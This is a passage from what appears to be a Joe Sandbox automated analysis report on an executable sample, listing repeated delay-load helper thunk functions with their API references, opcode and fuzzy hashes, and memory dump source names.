                                                                          • Opcode ID: 97483adb734cf941b594b1ff6b8e84539253e936183a38cc01014ddc00905010
                                                                          • Instruction ID: 6fd2f97f1018ab2edd984f370b52f52fbe3f189a98e540c7266a0a96cbe57c44
                                                                          • Opcode Fuzzy Hash: 97483adb734cf941b594b1ff6b8e84539253e936183a38cc01014ddc00905010
                                                                          • Instruction Fuzzy Hash: E0B012C2A582007D314451545C03D77116DC6C1B30334422EFC08C1082E8405CD13972
                                                                          Function 00F1E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: cc89d6d020f5fc1ff983c8b61fa83b4b24cf04e56c7ed6179581b60a92813899
                                                                          • Instruction ID: 843eb49d776fe6f7848f049e6d4d4f98f89285f4c2e1a22e13e2a1d75e2f420b
                                                                          • Opcode Fuzzy Hash: cc89d6d020f5fc1ff983c8b61fa83b4b24cf04e56c7ed6179581b60a92813899
                                                                          • Instruction Fuzzy Hash: 2DB012C2A581007C310451545D03D77516DC6C1B30374422EFC08C1082EC405D923972
                                                                          Function 00F1E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: b52f2d1fc5be1a32220da08e72ca02e1f2951141c6ffa39d08ac269180cad720
                                                                          • Instruction ID: e2ec5ef39a8a39255d2c17d12169bf3d04b7889b5a876adc9f5932ec26c84e00
                                                                          • Opcode Fuzzy Hash: b52f2d1fc5be1a32220da08e72ca02e1f2951141c6ffa39d08ac269180cad720
                                                                          • Instruction Fuzzy Hash: ECB012C2A591007D310451541C03D77114DC6C1B30330402EFC08C1081E8404C913972
                                                                          Function 00F1E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: a8b6a7d22940a69f5df78d38d07d7ce37f8dea4c89a1024fd9a9b7d63797e535
                                                                          • Instruction ID: 353e77a62ec3f9f916d9d31d06775b321884a9326e128761cc00e994c5dbc64b
                                                                          • Opcode Fuzzy Hash: a8b6a7d22940a69f5df78d38d07d7ce37f8dea4c89a1024fd9a9b7d63797e535
                                                                          • Instruction Fuzzy Hash: 6BB012C22581007C320452085C03D7B111DC5C1F34330422EFC08C0081E8405CC93E72
                                                                          Function 00F1E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 34d2d1456e9814f7ccedc2c4318903cac92ac36105575a9a79da0f976eee38e8
                                                                          • Instruction ID: 70c561e76ce129d3299706ebe46ec441e83c816ce185f578171316d9613ee01d
                                                                          • Opcode Fuzzy Hash: 34d2d1456e9814f7ccedc2c4318903cac92ac36105575a9a79da0f976eee38e8
                                                                          • Instruction Fuzzy Hash: 63B012C225D0007D310452081C03E7B110DC5C1F34330402EFC08C0081E8404C853E72
                                                                          Function 00F1E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 665ce883b6fce588b7a4b7dae8fb23b11a7d127292ebabbd21093b97d4c10748
                                                                          • Instruction ID: 17c33bbd51e74843e693479c51d341b91006845b5c2aac306e8c388cb159203d
                                                                          • Opcode Fuzzy Hash: 665ce883b6fce588b7a4b7dae8fb23b11a7d127292ebabbd21093b97d4c10748
                                                                          • Instruction Fuzzy Hash: 97B012C22580407C310452081D03D7B150DC5C1F34330802EFC08C0081E8404C863E72
                                                                          Function 00F1E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: dfc1a32ddac4a7bdb67845685d5292239dfd8e7ecd2d439a74daa498fb1860ac
                                                                          • Instruction ID: b75e0688d571e309ff1393ae7cafc8165f42a466910cdee60c682c2ddbfb1dd5
                                                                          • Opcode Fuzzy Hash: dfc1a32ddac4a7bdb67845685d5292239dfd8e7ecd2d439a74daa498fb1860ac
                                                                          • Instruction Fuzzy Hash: 7DB012C225C0007C310412241C07D7B110DC5C1F34730503EFC54D04C7A8404D893D72
                                                                          Function 00F1E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 94b3ed56a1e27024433ca38879ac2661d5294da00bc5f4c5fc3c4e87351bbee2
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: 94b3ed56a1e27024433ca38879ac2661d5294da00bc5f4c5fc3c4e87351bbee2
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: d614380c5449a616e1e740cae09815a6e9cf98b72827128913fbd0fa9c6c5af1
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: d614380c5449a616e1e740cae09815a6e9cf98b72827128913fbd0fa9c6c5af1
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: b914599b4bad7d7df67d98b7f0455d6e765cda338e9b49dd4adb9ed41e6622a2
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: b914599b4bad7d7df67d98b7f0455d6e765cda338e9b49dd4adb9ed41e6622a2
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: e5cde5b9ce44ba93476ac7bbadc364f0f249544584cdee9fe07cb7f9e5950b03
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: e5cde5b9ce44ba93476ac7bbadc364f0f249544584cdee9fe07cb7f9e5950b03
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: d883c8df9400cad62a55d87c931127b73f038d3237797d8feb80019c4ddf95d3
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: d883c8df9400cad62a55d87c931127b73f038d3237797d8feb80019c4ddf95d3
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 7f99a2f45509029d3687c2699a29388f3d9b95c8e8cd27860008b39602d8d692
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: 7f99a2f45509029d3687c2699a29388f3d9b95c8e8cd27860008b39602d8d692
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: dd2808cf81eec75d2d9bdbf995d7f507ec8bce293a082418676b7a4ec524eff9
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: dd2808cf81eec75d2d9bdbf995d7f507ec8bce293a082418676b7a4ec524eff9
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: b33b7a956b39542e7e8ba665842b83b09449414be62de7cfce30af7cce6e4fe3
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: b33b7a956b39542e7e8ba665842b83b09449414be62de7cfce30af7cce6e4fe3
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
